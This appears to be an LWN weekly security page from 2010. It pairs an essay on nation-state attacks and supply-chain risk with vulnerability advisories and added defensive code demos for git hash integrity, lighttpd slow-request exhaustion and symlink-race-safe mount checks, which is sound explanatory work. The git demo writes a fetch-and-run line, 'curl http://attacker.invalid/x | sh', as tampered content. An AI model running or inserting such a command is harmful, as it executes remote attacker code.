Security
Security in the 20-teens
Recently, Google announced that its operations in China (and beyond) had been subject to sophisticated attacks, some of which were successful; a number of other companies have been attacked as well. The source of these attacks may never be proved, but it is widely assumed that they were carried out by government agencies. There are also allegations that the East Anglia email leak was a government-sponsored operation. While at LCA, your editor talked with a developer who has recently found himself at Google; according to this developer, incidents like these demonstrate that the security game has changed in significant ways, with implications that the community can ignore only at its peril.

Whenever one talks about security, one must do so in the context of a specific threat model: what are we trying to defend ourselves against? Different threat models lead to very different conclusions. For years, one of the most pressing threats has been script kiddies and others using well-known vulnerabilities to break into systems; initially these breakins were mostly for fun, but, over time, these attackers have increasingly had commercial motivations. In response, Linux distributors have created reasonably secure-by-default installations and effective mechanisms for the distribution of updates. As a result, we are, by default, quite well defended against this class of attack when carried out remotely, and moderately well defended against canned local attacks.
Attackers with more determination and focus are harder to defend against; somebody who intends to break into a specific system in pursuit of a well-defined goal has a better chance of success. Chances are, only the most hardened of systems can stand up against focused attackers with local access. When these attackers are at the far end of a network connection, we still stand a reasonable chance of keeping them out.
Often, those concerned with security simply throw up their hands when confronted with the problem of defending a system against an attacker who is working with the resources available to national governments. Most of us assume that we'll not be confronted with such an attack, and that there's little that we could do about one if we were. When governmental attackers can obtain physical access, there probably is little to be done, but remote (foreign) governmental attackers may not be able to gain that sort of access.
What the attacks on Google (and others) tell us is that we've now entered an era where we need to be concerned about attacks from national governments. Probably we have been in such an epoch for a while now, but the situation has become increasingly clear. Thinking about the implications would make some sense.
A look at updates from distributors shows that we still have a steady stream of vulnerabilities in image processing libraries, PDF viewers, Flash players, and more. Some of these problems (yet another PNG buffer overflow, say) appear to have a relatively low priority, but they shouldn't. Media-based attacks can only become more common over time; it's easy to get a victim to look at a file or go to a specific web page. Properly targeted phishing (easily done by a national government) may be the method of choice for compromising specific systems for some time to come. Browsers, file viewers, and media players will play an unfortunate role in the compromise of many systems.
What may be even more worrisome, though, is the threat of back doors, trojan horses, or (perhaps most likely) subtle vulnerabilities inserted into our software development and distribution channels. This could happen at just about any stage in the chain.
On the development side, we like to think that code review would find deliberately coded security weaknesses. But consider this: kernel code tends to be reviewed more heavily than code in many other widely-used programs, and core kernel code gets more review than driver code. But none of that was able to prevent the vmsplice() vulnerability - caused by a beginner-level programming error - from getting into the mainline kernel. Many more subtle bugs are merged in every development cycle. We can't ever catch them all; what are our chances against a deliberately-inserted, carefully-hidden hole?
Source code management has gotten more robust in recent years; the widespread use of tools like git and mercurial effectively guarantees that an attempt to corrupt a repository somewhere will be detected. But that nice assumption only holds true for as long as one assumes that the hash algorithms used to identify commits are not subject to brute-force collisions. One should be careful about such assumptions when the computing resources of a national government can be brought to bear. We might still detect an attempt to exploit a hash collision - but our chances are not as good.
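The detection property described above rests entirely on content addressing: every git object is named by the SHA-1 of its type, length and bytes, and a commit names its tree, which names its blobs, so altering any stored byte changes the name unless the attacker can produce a second preimage or collision for it. The following added example (written for this page, not git's own code) reimplements that naming scheme for blobs, flat trees and commits, builds a tiny object store, tampers with a blob in place and shows that an fsck-style walk catches it; the store layout and the `fsck` helper are this example's own simplifications.

```python
import hashlib


def git_object_id(obj_type: str, content: bytes) -> str:
    """SHA-1 over "<type> <len>\\0<content>", which is exactly how git names objects."""
    header = f"{obj_type} {len(content)}\0".encode()
    return hashlib.sha1(header + content).hexdigest()


def make_tree(entries):
    """entries: list of (mode, name, blob_oid). Returns (oid, raw tree bytes).

    Entries are sorted by name, which matches git's ordering for a flat tree of
    plain files (git sorts directory names as if they had a trailing '/')."""
    raw = b"".join(
        f"{mode} {name}\0".encode() + bytes.fromhex(oid)
        for mode, name, oid in sorted(entries, key=lambda e: e[1])
    )
    return git_object_id("tree", raw), raw


def make_commit(tree_oid, parent_oid, ident, message):
    """Build a commit object; the tree (and thus every blob) is bound by the commit id."""
    lines = [f"tree {tree_oid}"]
    if parent_oid:
        lines.append(f"parent {parent_oid}")
    lines += [f"author {ident}", f"committer {ident}", "", message]
    raw = ("\n".join(lines) + "\n").encode()
    return git_object_id("commit", raw), raw


def fsck(store):
    """store: {oid: (type, content)}. Return the oids whose bytes no longer hash to their name.

    This is the check a repository walk (git fsck, or a fetch verifying objects) performs;
    an attacker who edits an object in place must defeat SHA-1 to pass it."""
    return sorted(oid for oid, (t, c) in store.items() if git_object_id(t, c) != oid)


def build_demo_store():
    """Constructed sample repository: one blob, one tree, one commit (not real project data)."""
    store = {}
    blob_oid = git_object_id("blob", b"hello\n")
    store[blob_oid] = ("blob", b"hello\n")
    tree_oid, tree_raw = make_tree([("100644", "hello.txt", blob_oid)])
    store[tree_oid] = ("tree", tree_raw)
    ident = "Example Dev <dev@example.invalid> 1265000000 +0000"  # constructed identity
    commit_oid, commit_raw = make_commit(tree_oid, None, ident, "initial import")
    store[commit_oid] = ("commit", commit_raw)
    return store, blob_oid, commit_oid


def tamper(store, oid, new_content):
    """Simulate an attacker rewriting an object's bytes while keeping its name."""
    obj_type, _ = store[oid]
    store[oid] = (obj_type, new_content)


if __name__ == "__main__":
    store, blob_oid, commit_oid = build_demo_store()
    print("clean store, bad objects:", fsck(store))
    tamper(store, blob_oid, b"hello\ncurl http://attacker.invalid/x | sh\n")
    print("after tamper, bad objects:", fsck(store))
```

Running the block prints an empty list for the clean store and the blob's id after the in-place edit. The caveat the paragraph raises has since materialised: practical SHA-1 collisions, including chosen-prefix ones, have been demonstrated, which is why git gained an (experimental) SHA-256 object format; signed tags and commits only help to the extent that the hash they sign still resists collisions.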
In any case, the software that ends up on our systems does not come directly from the source repositories; distributors apply changes of their own and build binary packages from that source. The building of packages is, one hopes, relatively robust; distributors have invested some significant resources into package signing and verification mechanisms. The Fedora and Red Hat intrusions show that this link in the chain is indeed subject to attack, but it is probably not one of the weakest links.
A weaker point may be the source trees found on developer laptops and the patches that those developers apply. A compromise of the right developer's system could render the entire signing mechanism moot; it will just sign code which has already been corrupted. Community distributions, which (presumably) have weaker controls, could be especially vulnerable to this attack vector. In that context, it's worth bearing in mind that distributions like Debian and Gentoo - at least - are extensively used in a number of sensitive environments. Enterprise distributions might be better defended against the injection of unwanted code, but the payback for the insertion of a hole into an enterprise distribution could be high. Users of community rebuilds of enterprise distributions (LWN being one of those) should bear in mind that they have added one more link to the chain of security that they depend on.
Then again, all of that may be unnecessary; perhaps ordinary bugs are enough to open our systems to sufficiently determined attackers. We certainly have no shortage of them. One assumes that no self-respecting, well-funded governmental operation would be without a list of undisclosed vulnerabilities close at hand. They have the resources to look for unknown bugs, to purchase the information from black-hat crackers, and to develop better static analysis tools than we have.
All told, it is a scary situation, one which requires that we rethink the security of our systems and processes from one end to the other. Otherwise we risk becoming increasingly vulnerable to well-funded attackers. We also risk misguided and destructive attempts to secure the net through heavy-handed regulation; see this ZDNet article for a somewhat confusing view of how that could come about.
The challenge is daunting, and it may be insurmountable. But, then, we as a community have overcome many other challenges that the world thought we would never get past, and the attacks seem destined to happen regardless of whether we try to improve our defenses. If we could achieve a higher level of security while preserving the openness of our community and the vitality of our development process, Linux would be even closer to World Domination than it is now. Even in the absence of other minor concerns - freedom, the preservation of fundamental civil rights, and the preservation of an open network, for example - this goal would be worth pursuing.
Brief items
China Internet Network Information Center accepted as a Mozilla root CA
Those who are concerned about the security of Mozilla's SSL certificate validation might want to take a look at this bugzilla entry. It seems that, at the end of October, Mozilla approved the addition of the China Internet Network Information Center (CNNIC) as a root certification authority, meaning that Firefox will accept CNNIC-signed certificates as valid and fully trusted. CNNIC is said to be controlled by the Chinese government and is alleged to be heavily involved in spying on Chinese citizens; numerous people are concerned that it will use its root CA position to facilitate man-in-the-middle attacks. Unfortunately, most of these concerns were not raised during the discussion period, making the removal of CNNIC - if warranted - harder.
Security reports
Two information leak vulnerabilities in Bugzilla
The Bugzilla project is reporting two information leaks that could lead to the disclosure of sensitive data. Several directories (CVS/, contrib/, docs/en/xml/, and t/) and the old-params.txt file were not restricted from being served by Bugzilla. By default, they do not contain sensitive information, but custom installations may have added files with passwords or other information. Also, certain bugs could be made public, at least briefly, when they were moved to a different product. Versions 3.0.11, 3.2.6, 3.4.5, and 3.5.3 have been released to address the leaks.
New vulnerabilities
bltk: privilege escalation
Package(s): bltk
CVE #(s): none listed
Created: January 29, 2010
Updated: February 19, 2010
Description: From the Fedora advisory: bltk will run any command as root.
Alerts:
hybserv: denial of service
Package(s): hybserv
CVE #(s): CVE-2010-0303
Created: January 29, 2010
Updated: February 3, 2010
Description: From the Debian advisory: Julien Cristau discovered that hybserv, a daemon running IRC services for IRCD-Hybrid, is prone to a denial of service attack via the commands option.
Alerts:
ircd-hybrid/ircd-ratbox: multiple vulnerabilities
Package(s): ircd-hybrid/ircd-ratbox
CVE #(s): CVE-2009-4016 CVE-2010-0300
Created: January 28, 2010
Updated: June 9, 2010
Description: From the Debian alert: David Leadbeater discovered an integer underflow that could be triggered via the LINKS command and can lead to a denial of service or the execution of arbitrary code (CVE-2009-4016). This issue affects both ircd-hybrid and ircd-ratbox. It was discovered that the ratbox IRC server is prone to a denial of service attack via the HELP command. The ircd-hybrid package is not vulnerable to this issue (CVE-2010-0300).
Alerts:
kernel: insecure devtmpfs permissions
Package(s): kernel
CVE #(s): CVE-2010-0299
Created: February 1, 2010
Updated: February 8, 2010
Description: From the Mandriva advisory: An issue was discovered in 2.6.32.x kernels, which set insecure permissions for the devtmpfs filesystem by default. (CVE-2010-0299)
Alerts:
kernel: arbitrary code execution
Package(s): kernel
CVE #(s): CVE-2009-1385
Created: February 3, 2010
Updated: February 3, 2010
Description: From the Red Hat advisory: A flaw was found in the Intel PRO/1000 Linux driver (e1000) in the Linux kernel. Frames with sizes near the MTU of an interface may be split across multiple hardware receive descriptors. Receipt of such a frame could leak through a validation check, leading to a corruption of the length check. A remote attacker could use this flaw to send a specially-crafted packet that would cause a denial of service or code execution. (CVE-2009-1385, Important)
Alerts:
lighttpd: denial of service
Package(s): lighttpd
CVE #(s): CVE-2010-0295
Created: February 2, 2010
Updated: June 3, 2010
Description: From the Debian advisory: Li Ming discovered that lighttpd, a small and fast webserver with minimal memory footprint, is vulnerable to a denial of service attack due to bad memory handling. Slowly sending very small chunks of request data causes lighttpd to allocate new buffers for each read instead of appending to old ones. An attacker can abuse this behaviour to cause denial of service conditions due to memory exhaustion.
Alerts:
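The lighttpd advisory describes a memory-amplification bug: a client that trickles a request body one byte per read makes the server pay a full buffer per read. The added example below (written for this page, not lighttpd's code) models the two allocation strategies side by side and adds the kind of per-connection guard an operator wants regardless of the fix. The 4096-byte read buffer, the one-byte drip and the rate thresholds are this example's assumptions, not lighttpd's actual constants.

```python
READ_BUF = 4096  # assumed per-read buffer size for the model (not lighttpd's real constant)


class PerReadBuffer:
    """Vulnerable pattern: every read() result lands in a brand-new, full-size buffer,
    so a one-byte read still costs READ_BUF bytes of heap."""

    def __init__(self):
        self.chunks = []  # list of [buffer, bytes_used]

    def feed(self, data: bytes):
        buf = bytearray(READ_BUF)
        buf[:len(data)] = data
        self.chunks.append([buf, len(data)])

    def allocated(self):
        return READ_BUF * len(self.chunks)

    def used(self):
        return sum(used for _, used in self.chunks)


class AppendingBuffer:
    """Fixed pattern: append into the last buffer while it has room; allocate only when full."""

    def __init__(self):
        self.chunks = []

    def feed(self, data: bytes):
        view = memoryview(data)
        while view:
            if not self.chunks or self.chunks[-1][1] == READ_BUF:
                self.chunks.append([bytearray(READ_BUF), 0])
            buf, used = self.chunks[-1]
            n = min(len(view), READ_BUF - used)
            buf[used:used + n] = view[:n]
            self.chunks[-1][1] = used + n
            view = view[n:]

    def allocated(self):
        return READ_BUF * len(self.chunks)

    def used(self):
        return sum(used for _, used in self.chunks)


def drip(n_bytes: int, chunk: int = 1):
    """Constructed attacker traffic: n_bytes of body delivered chunk bytes per read."""
    for _ in range(n_bytes // chunk):
        yield b"A" * chunk


def simulate(buffer_cls, n_bytes: int, chunk: int = 1):
    """Return (heap bytes allocated, body bytes actually received) for one connection."""
    body = buffer_cls()
    for piece in drip(n_bytes, chunk):
        body.feed(piece)
    return body.allocated(), body.used()


class SlowRequestGuard:
    """Defence in depth independent of the buffer fix: cap the body size and drop
    connections whose body arrives slower than min_rate bytes/s after a grace period."""

    def __init__(self, max_body: int, min_rate: float, grace_s: float):
        self.max_body, self.min_rate, self.grace_s = max_body, min_rate, grace_s

    def verdict(self, received: int, elapsed_s: float):
        if received > self.max_body:
            return "reject: body too large"
        if elapsed_s > self.grace_s and received / elapsed_s < self.min_rate:
            return "reject: body too slow"
        return None  # keep reading


if __name__ == "__main__":
    for cls in (PerReadBuffer, AppendingBuffer):
        alloc, got = simulate(cls, 10_000)
        print(f"{cls.__name__:16s} received {got} bytes, allocated {alloc} bytes")
    guard = SlowRequestGuard(max_body=1 << 20, min_rate=100.0, grace_s=10.0)
    print(guard.verdict(received=120, elapsed_s=60.0))
```

With a one-byte drip the vulnerable buffer allocates 4096 bytes per received byte, a 4096x amplification that a few thousand idle connections turn into gigabytes, while the appending buffer stays within one read buffer of the body size. The guard is worth keeping even on a fixed server: it bounds what any one connection can cost in memory and socket lifetime, which is the same class of exposure slowloris-style attacks exploit.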
maildrop: privilege escalation
Package(s): maildrop
CVE #(s): CVE-2010-0301
Created: January 28, 2010
Updated: September 7, 2010
Description: From the Debian alert: Christoph Anton Mitterer discovered that maildrop, a mail delivery agent with filtering abilities, is prone to a privilege escalation issue that grants a user root group privileges.
Alerts:
moodle: multiple vulnerabilities
Package(s): moodle
CVE #(s): CVE-2009-4297 CVE-2009-4298 CVE-2009-4299 CVE-2009-4301 CVE-2009-4302 CVE-2009-4303 CVE-2009-4305
Created: February 3, 2010
Updated: February 16, 2010
Description: From the Debian advisory: CVE-2009-4297: Multiple cross-site request forgery (CSRF) vulnerabilities have been discovered. CVE-2009-4298: It has been discovered that the LAMS module is prone to the disclosure of user account information. CVE-2009-4299: The Glossary module has an insufficient access control mechanism. CVE-2009-4301: Moodle does not properly check permissions when the MNET service is enabled, which allows remote authenticated servers to execute arbitrary MNET functions. CVE-2009-4302: The login/index_form.html page links to an HTTP page instead of using an SSL secured connection. CVE-2009-4303: Moodle stores sensitive data in backup files, which might make it possible for attackers to obtain them. CVE-2009-4305: It has been discovered that the SCORM module is prone to an SQL injection. Additionally, an SQL injection in the update_record function, a problem with symbolic links and a verification problem with Glossary, database and forum ratings have been fixed.
Alerts:
ncpfs: privilege escalation
Package(s): ncpfs
CVE #(s): CVE-2009-3297
Created: January 28, 2010
Updated: March 1, 2011
Description: From the Red Hat bugzilla entry: Ronald Volgers found a race condition in the samba-client's mount.cifs utility. Local, unprivileged user could use this flaw to conduct symlink attacks, leading to disclosure of sensitive information, or, possibly to privilege escalation. The same CVE covers the equivalent race in the setuid ncpmount and ncpumount utilities shipped in ncpfs, which is why the ncpfs package is listed here.
Alerts:
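Both mount helpers covered by CVE-2009-3297 are setuid-root programs that validate a user-supplied mount point by path and then act on that path later, which is the check-then-use window a symlink race exploits. The added example below (written for this page, not the code of ncpfs or Samba) contrasts the fragile pattern with the general fix: resolve the directory one component at a time with O_NOFOLLOW, validate the resulting file descriptor, and keep operating on that descriptor so a later rename or symlink swap cannot redirect the privileged operation. The demo directory layout is constructed in a temporary directory; the ownership check uses the calling uid in place of a real unprivileged user.

```python
import os
import tempfile


def naive_mountpoint_check(path: str, uid: int) -> bool:
    """Fragile pattern: realpath() happily follows symlinks, and the caller later
    acts on the path string, so what was checked need not be what gets used."""
    resolved = os.path.realpath(path)
    return os.stat(resolved).st_uid == uid


def open_dir_nofollow(path: str) -> int:
    """Walk an absolute path one component at a time relative to the previous
    directory fd, refusing symlinks (O_NOFOLLOW) and non-directories (O_DIRECTORY)
    at every step. Returns an fd that names the directory itself, not a path."""
    if not os.path.isabs(path):
        raise ValueError("mount point must be an absolute path")
    fd = os.open("/", os.O_RDONLY | os.O_DIRECTORY)
    try:
        for component in filter(None, path.split("/")):
            if component == "..":
                raise ValueError("'..' is not allowed in a mount point")
            next_fd = os.open(component,
                              os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW,
                              dir_fd=fd)
            os.close(fd)
            fd = next_fd
    except BaseException:
        os.close(fd)
        raise
    return fd


def hardened_mountpoint_fd(path: str, uid: int) -> int:
    """Return an fd for the mount point after verifying, on the fd, that the
    invoking user owns it. A privileged caller would then fchdir(fd) and mount
    "." so the object checked here is exactly the object mounted on."""
    fd = open_dir_nofollow(path)
    st = os.fstat(fd)
    if st.st_uid != uid:
        os.close(fd)
        raise PermissionError(f"{path} is not owned by uid {uid}")
    return fd


def demo():
    """Constructed layout: <tmp>/real is a directory, <tmp>/link is a symlink to it.
    Returns (naive check accepted the symlink, hardened check accepted the symlink)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.realpath(tmp)  # avoid symlinked temp roots skewing the result
        real = os.path.join(base, "real")
        link = os.path.join(base, "link")
        os.mkdir(real)
        os.symlink(real, link)
        uid = os.getuid()

        naive_accepts_link = naive_mountpoint_check(link, uid)
        try:
            fd = hardened_mountpoint_fd(link, uid)
            os.close(fd)
            hardened_accepts_link = True
        except OSError:          # ELOOP from O_NOFOLLOW on the symlink component
            hardened_accepts_link = False

        fd = hardened_mountpoint_fd(real, uid)  # the genuine directory still works
        os.close(fd)
        return naive_accepts_link, hardened_accepts_link


if __name__ == "__main__":
    print("naive accepts symlink: %s, hardened accepts symlink: %s" % demo())
```

The fd-based approach is the only one that closes the race: it does not matter what an attacker renames between the check and the mount, because the kernel operation is issued against the descriptor already validated. Refusing symlinks outright is a policy choice that fits a setuid helper; a service that must accept them can instead resolve the link and re-validate the final fd, but it still must not go back to the path string.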
mysql: access restriction bypass
Package(s): mysql
CVE #(s): CVE-2008-7247
Created: February 2, 2010
Updated: November 16, 2010
Description: From the CVE entry: sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
Alerts:
postgresql: denial of service
Package(s): postgresql-server
CVE #(s): CVE-2010-0442
Created: February 3, 2010
Updated: May 28, 2010
Description: From the NVD entry: The bitsubstr function in backend/utils/adt/varbit.c in PostgreSQL 8.0.23, 8.1.11, and 8.3.8 allows remote authenticated users to cause a denial of service (daemon crash) or have unspecified other impact via vectors involving a negative integer in the third argument, as demonstrated by a SELECT statement that contains a call to the substring function for a bit string, related to an "overflow."
Alerts:
rootcerts: upgrade to latest certdata.txt
Package(s): rootcerts
CVE #(s): none listed
Created: January 29, 2010
Updated: February 4, 2010
Description: From the Mandriva advisory: The rootcerts package was added in Mandriva in 2005 and was meant to be updated when necessary. The provided rootcerts packages have been upgraded using the latest certdata.txt file from the mozilla cvs repository, as of 2009/12/03.
Alerts:
roundcubemail: information disclosure
Package(s): roundcubemail
CVE #(s): CVE-2010-0464
Created: February 3, 2010
Updated: February 25, 2010
Description: From the Red Hat bugzilla entry: Roundcube 0.3.1 and earlier does not request that the web browser avoid DNS prefetching of domain names contained in e-mail messages, which makes it easier for remote attackers to determine the network location of the webmail user by logging DNS requests.
Alerts:
wireshark: multiple vulnerabilities
Package(s): wireshark
CVE #(s): CVE-2009-4337 CVE-2010-0304
Created: February 1, 2010
Updated: May 28, 2010
Description: From the Debian advisory: CVE-2009-4337: A NULL pointer dereference was found in the SMB/SMB2 dissectors. CVE-2010-0304: Several buffer overflows were found in the LWRES dissector.
Alerts:
zabbix: multiple vulnerabilities
Package(s): zabbix
CVE #(s): CVE-2009-4499 CVE-2009-4501
Created: January 28, 2010
Updated: February 3, 2010
Description: From the CVE entry for CVE-2009-4499: SQL injection vulnerability in the get_history_lastid function in the nodewatcher component in Zabbix Server before 1.6.8 allows remote attackers to execute arbitrary SQL commands via a crafted request, possibly related to the send_history_last_id function in zabbix_server/trapper/nodehistory.c. From the CVE entry for CVE-2009-4501: The zbx_get_next_field function in libs/zbxcommon/str.c in Zabbix Server before 1.6.8 allows remote attackers to cause a denial of service (crash) via a request that lacks expected separators, which triggers a NULL pointer dereference, as demonstrated using the Command keyword.
Alerts:
Page editor: Jake Edge